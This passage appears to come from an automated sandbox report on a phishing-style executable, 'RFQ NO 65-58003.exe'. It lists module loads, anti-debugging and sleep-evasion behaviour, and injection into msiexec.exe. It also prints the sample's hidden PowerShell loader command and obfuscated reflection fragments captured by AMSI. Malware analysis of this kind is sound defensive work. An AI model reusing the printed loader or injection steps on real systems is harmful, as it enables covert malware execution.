              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: RFQ NO 65-58003.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Ljubljana $Halvulden $Stoker), (idrtsanlgget @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Demetri12 = [AppDomain]::CurrentDomain.GetAssemblies()$global:
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Toppers)), $Unoptimistically).DefineDynamicModule($Indholdsanalysers, $false).DefineType($Remains, $Educability, [System.MulticastDele
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gastriskes=$Sonnetish.SubString(65822,3);.$Gastriskes($Sonnetish)
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gastriskes=$Sonnetish.SubString(65822,3);.$Gastriskes($Sonnetish)
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 17_2_004044A4
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_21202806 push ecx; ret 14_2_21202819
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_21211219 push esp; iretd 14_2_2121121A
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_0044693D push ecx; ret 17_2_0044694D
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_0044DB70 push eax; ret 17_2_0044DB84
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_0044DB70 push eax; ret 17_2_0044DBAC
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 17_2_00451D54 push eax; ret 17_2_00451D61
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_0044B090 push eax; ret 19_2_0044B0A4
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_0044B090 push eax; ret 19_2_0044B0CC
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_00451D34 push eax; ret 19_2_00451D41
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 19_2_00444E71 push ecx; ret 19_2_00444E81
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_00414060 push eax; ret 20_2_00414074
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_00414060 push eax; ret 20_2_0041409C
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_00414039 push ecx; ret 20_2_00414049
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_004164EB push 0000006Ah; retf 20_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_00416553 push 0000006Ah; retf 20_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 20_2_00416555 push 0000006Ah; retf 20_2_004165C4

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_004047CB
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7216
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2482
              Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 9.2 %
              Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 8.3 %
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1484 Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 1088 Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5984 Thread sleep count: 99 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5984 Thread sleep time: -49500s >= -30000s
              Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe Code function: 0_2_00406555 FindFirstFileW,FindClose,0_2_00406555
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe Code function: 0_2_0040287E FindFirstFileW,0_2_0040287E
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe Code function: 0_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405A03
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_212010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,14_2_212010F1
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_21206580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,14_2_21206580
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_0040AE51 FindFirstFileW,FindNextFileW,17_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407898
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00418981 memset,GetSystemInfo,17_2_00418981
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: ModuleAnalysisCache.2.dr Binary or memory string: Remove-NetEventVmNetworkAdapter
              Source: ModuleAnalysisCache.2.dr Binary or memory string: Add-NetEventVmNetworkAdapter
              Source: svchost.exe, 0000000D.00000002.3394354847.000002B99EE55000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3393112633.000002B99982B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3394879441.00000000056B5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: ModuleAnalysisCache.2.dr Binary or memory string: Get-NetEventVmNetworkAdapter
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exe API call chain: ExitProcess graph end node graph_0-3535
              Source: C:\Windows\SysWOW64\msiexec.exe API call chain: ExitProcess graph end node
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_21202933 IsProcessorFeaturePresent,LdrInitializeThunk,LdrInitializeThunk,14_2_21202933
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_212060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_212060E2
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,17_2_004044A4
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_21204AB4 mov eax, dword ptr fs:[00000030h] 14_2_21204AB4
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_2120724E GetProcessHeap,14_2_2120724E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\msiexec.exe Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_212060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_212060E2
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_21202B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_21202B1C
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_21202639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_21202639

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3AE0000
